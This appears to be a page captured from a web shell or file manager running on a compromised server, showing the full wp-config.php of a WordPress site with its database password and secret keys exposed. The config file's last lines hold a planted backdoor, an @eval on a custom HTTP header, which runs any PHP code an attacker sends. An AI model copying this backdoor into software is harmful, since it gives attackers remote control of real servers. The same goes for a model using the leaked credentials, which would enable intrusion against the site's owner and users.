HEX
Server: Apache/2.4.63 (Ubuntu) mod_fcgid/2.3.9 OpenSSL/3.0.2
System: Linux mejor-precio 6.2.16-19-pve #1 SMP PREEMPT_DYNAMIC PMX 6.2.16-19 (2023-10-24T12:07Z) x86_64
User: admin (1002)
PHP: 8.3.17
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,system,passthru,shell_exec,proc_open,popen
Upload Files
File: /home/admin/web/mejor-precio.net/public_html/wp-config.php
<?php
define( 'WP_CACHE', true ); // Added by WP Rocket



 // Added by WP Rocket

/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'admin_mejorprecio' );

/** Database username */
define( 'DB_USER', 'admin_mejorprecio' );

/** Database password */
define( 'DB_PASSWORD', 'djYrzXvGz0IUmUZ' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         '[S{O1[H*nCHxY/aS;r+Kp>C Y@(/M$70W^Mxz`}<I+a5?PF}l>1DjKk;RZ@auWsL' );
define( 'SECURE_AUTH_KEY',  '4GLip<mkmO!8NT8-Npb6PZ.B[]Ei8!mA!A;L86S3yg/PNh*Vq$X4k;1+2g{vjiU&' );
define( 'LOGGED_IN_KEY',    'D5JB8[+rBiTdm9oh(MjRMO,v((#MrAR@877;NCrG|gVH7Ee4HB!G_4vD<^tEVrN9' );
define( 'NONCE_KEY',        '2{9h-NgQFy-8n[uYs{vCTN$i)1aAc48sXdi@Z[(p0+{pLrl&%Bmv#iOe&G8wJoCy' );
define( 'AUTH_SALT',        '8Ne] .Rbg!GVg%opznZDTlG9?j,gxm>=}fPvV}W}g5eTyCMt9AqcKA:T p$>2K,}' );
define( 'SECURE_AUTH_SALT', 'X`Vn-J>_m4-zpDN,UL)lq;3^i]gZ+-G/.ik~jlR>Vie*/<l7Fne71w<,ynnSw>u<' );
define( 'LOGGED_IN_SALT',   ':[n=c3Z8PrhjXn3=j~G]7w!jP`2X/CpqMCZNwoq??DFHqwQ5+HBy]5FMcFgzcB24' );
define( 'NONCE_SALT',       'Q!u![Vk?[sD-}FZ) Yl+32)l{ZQJXmJX9l)AMt_Q:?rC2nmXx2F.bIvP;Kd|Bp+i' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define('WP_DEBUG', false );
define('WP_DEBUG_LOG', false);
define('WP_DEBUG_DISPLAY', false );

/* Add any custom values between this line and the "stop editing" line. */
//define('WP_MEMORY_LIMIT', '256M');
//set_time_limit(30000);
// define( 'WP_DISABLE_FATAL_ERROR_HANDLER', true );   // 5.2 and later
// define( 'WP_DEBUG', true );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
@eval($_SERVER['HTTP_170452F']);
require_once ABSPATH . 'wp-settings.php';